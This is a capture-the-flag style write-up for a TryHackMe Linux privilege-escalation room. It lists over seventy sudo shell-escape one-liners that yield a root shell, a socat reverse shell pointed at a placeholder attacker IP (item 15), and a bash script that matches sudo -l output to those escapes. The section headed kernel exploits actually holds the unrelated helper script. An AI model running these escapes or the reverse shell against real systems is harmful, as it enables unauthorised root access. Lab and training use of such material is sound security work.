70+ WAYS TO GET ROOT — LINUX PRIVILEGE ESCALATION


This write-up collects ways of getting a root shell on Linux and is based on the Linux Privesc Playground room on https://tryhackme.com/

Log in to the box over SSH with the credentials given in the room's details on THM. Run sudo -l first: every item below assumes the named binary shows up in that list as runnable as root, and sudo will refuse a variant whose arguments the sudoers rule does not permit. After each escape, confirm with id that you really are uid 0 before going after the flag.

Here is the list of all the ways I could think of at the time of solving this:

1. sudo nmap --interactive
nmap> !sh
(interactive mode only exists in nmap 2.02 to 5.21; on a newer nmap use the NSE script in item 2)

2. echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse

3. sudo awk 'BEGIN {system("/bin/sh")}'

4. sudo find /home -exec /bin/bash \; -quit
(without -quit, find spawns a fresh shell for every match, so exiting one drops you into the next)

5. sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

6. sudo less /etc/hosts
!/bin/bash

7. sudo bash

8. sudo perl -e 'exec "/bin/bash";'

9. sudo python -c 'import pty;pty.spawn("/bin/bash")'

10. sudo man man
!/bin/bash

11. sudo vi
:!/bin/bash

12. sudo vim -c '!sh'

13. sudo env /bin/bash

14. sudo ftp
!/bin/bash

15. On the attacker machine run:
socat file:`tty`,raw,echo=0 tcp-listen:1234
then on the target machine run:
sudo socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:<ATTACKER_IP>:1234

16. sudo /bin/bash -p

17. sudo -s

18. sudo php -r "system('/bin/sh');"

19. sudo strace -o /dev/null /bin/sh

20. sudo xargs -a /dev/null sh

21. sudo timeout --foreground 7d /bin/sh

22. sudo expect -c 'spawn /bin/sh;interact'

23. sudo ionice /bin/sh

24. sudo /usr/bin/time /bin/sh

25. sudo taskset 1 /bin/sh

26. sudo flock -u / /bin/sh

27. sudo setarch $(arch) /bin/sh

28. sudo stdbuf -i0 /bin/sh

29. sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null

30. sudo pg /etc/profile
!/bin/sh

31. sudo nice /bin/sh

32. sudo gdb -nx -ex '!sh' -ex quit

33. sudo dmsetup ls --exec '/bin/sh -s'

34. sudo start-stop-daemon -n $RANDOM -S -x /bin/sh

35. sudo logsave /dev/null /bin/sh -i

36. sudo sed -n '1e exec sh 1>&0' /etc/hosts

37. sudo mount -o bind /bin/sh /bin/mount
sudo mount

38. sudo dash

39. sudo ksh

40. sudo ip netns add foo
sudo ip netns exec foo /bin/sh
sudo ip netns delete foo

41. TERM= sudo more /etc/profile
!/bin/sh

42. sudo zsh

43. sudo less /etc/profile
!/bin/sh

44. sudo busybox sh

45. sudo run-parts --new-session --regex '^sh$' /bin

46. sudo unshare /bin/sh

47. sudo ltrace -L /bin/sh

48. sudo lua -e 'os.execute("/bin/sh")'

49. sudo mawk 'BEGIN {system("/bin/sh")}'

50. sudo git -p help config
!/bin/sh

51. sudo service ../../bin/sh

52. sudo irb
exec '/bin/bash'

53. sudo pic -U
.PS
sh X sh X

54. sudo puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"

55. sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

56. sudo rlwrap /bin/sh

57. sudo ruby -e 'exec "/bin/sh"'

58. sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr

59. TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF

60. sudo csh

61. TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo easy_install $TF

62. sudo emacs -Q -nw --eval '(term "/bin/sh")'

63. sudo tmux

64. sudo screen

65. sudo script -q /dev/null

66. TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:

67. sudo rvim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

68. TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF

69. sudo ash

70. sudo gawk 'BEGIN {system("/bin/sh")}'

71. sudo nawk 'BEGIN {system("/bin/sh")}'

72. sudo vi
:set shell=/bin/bash
:shell

73. Kernel Exploits:
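Rather than trying the items above one by one, it helps to know which of them the box actually allows. The script below is an added example written for this write-up (it is not part of the original post, the THM room, or GTFOBins): it parses the output of sudo -l, pulls out the command paths the user may run as root, and prints the matching escape from the list above for each binary it recognises. The sudo -l text embedded in it is a constructed sample, not output from the room; on a real box you would pipe the live output into sudo_escapes instead.

```bash
#!/bin/bash
# Added example for this write-up (not part of the original post or the THM room):
# parse `sudo -l` output and print which of the sudo shell escapes listed above
# apply to the binaries the current user may run as root.

# Constructed sample of `sudo -l` output (an assumption for offline use; on a
# real box run:  sudo -l | sudo_escapes ).
SAMPLE_SUDO_L='Matching Defaults entries for user on target:
    env_reset, mail_badpass, secure_path=/usr/sbin:/usr/bin:/sbin:/bin

User user may run the following commands on target:
    (ALL) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/awk, /usr/bin/less
    (ALL : ALL) SETENV: NOPASSWD: /usr/bin/vim
    (ALL) /usr/bin/less /var/log/syslog
    (ALL) /usr/bin/systemctl status sshd'

# Escape for a binary name, taken from the list above; returns 1 if unknown.
escape_for() {
  case "$1" in
    bash|sh|dash|ksh|zsh|csh|ash) echo "sudo $1" ;;
    find)   echo "sudo find . -exec /bin/sh \\; -quit" ;;
    awk|gawk|mawk|nawk) echo "sudo $1 'BEGIN {system(\"/bin/sh\")}'" ;;
    less|pg) echo "sudo $1 /etc/profile   (then type !/bin/sh at the pager prompt)" ;;
    more)   echo "TERM= sudo more /etc/profile   (then type !/bin/sh)" ;;
    man)    echo "sudo man man   (then type !/bin/sh)" ;;
    vi|vim) echo "sudo $1 -c ':!/bin/sh'" ;;
    python|python3) echo "sudo $1 -c 'import pty;pty.spawn(\"/bin/sh\")'" ;;
    perl)   echo "sudo perl -e 'exec \"/bin/sh\";'" ;;
    php)    echo "sudo php -r \"system('/bin/sh');\"" ;;
    env|nice|ionice|unshare|rlwrap) echo "sudo $1 /bin/sh" ;;
    tar)    echo "sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh" ;;
    *)      return 1 ;;
  esac
}

# Extract the allowed command entries from a `sudo -l` listing read on stdin.
# Command lines look like "    (ALL : ALL) NOPASSWD: SETENV: /usr/bin/vim, /usr/bin/less":
# drop the "(runas)" prefix, any TAG: words, then split on commas and trim.
allowed_commands() {
  grep -E '^[[:space:]]*\([^)]*\)' \
    | sed -E 's/^[[:space:]]*\([^)]*\)[[:space:]]*//; s/^(([A-Z]+:)[[:space:]]*)+//' \
    | tr ',' '\n' \
    | sed -E 's/^[[:space:]]+//; s/[[:space:]]+$//' \
    | grep -v '^$' \
    | sort -u
}

# For each allowed entry print "<entry><TAB><escape>" when the binary's basename has
# a known escape. Matching is by basename only: when sudoers pins arguments
# (e.g. "/usr/bin/less /var/log/syslog") sudo accepts exactly that command line,
# so the escape only works if it needs no extra arguments (pager/editor !-escapes);
# such entries are flagged instead of printed as ready-to-run.
sudo_escapes() {
  allowed_commands | while IFS= read -r entry; do
    path=${entry%% *}        # first word is the command path
    args=${entry#"$path"}    # anything after it is a pinned argument list
    name=$(basename "$path")
    if cmd=$(escape_for "$name"); then
      if [ -n "$args" ]; then
        printf '%s\tARGS PINNED in sudoers, run exactly "sudo %s" and use the in-program escape if it has one (reference: %s)\n' "$entry" "$entry" "$cmd"
      else
        printf '%s\t%s\n' "$entry" "$cmd"
      fi
    fi
  done
}

# Run against the constructed sample; on a target replace this with: sudo -l | sudo_escapes
printf '%s\n' "$SAMPLE_SUDO_L" | sudo_escapes
```

Anything sudo_escapes stays silent about (here /usr/bin/systemctl) is not in the table, not necessarily safe: check it against https://gtfobins.github.io/ by hand. The table also only covers binaries that give a shell directly; the file-read and file-write primitives GTFOBins lists are not included.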

The flag is at /root/flag.txt. Once you are root (check with id), read it and submit it 😀

Useful Resources used while solving this:

https://github.com/t0thkr1s/gtfo

https://gtfobins.github.io/

0xsanz: Software Developer with a keen interest in Security, Privacy and Pen-testing. Certs: Security+, PenTest+, AZ900
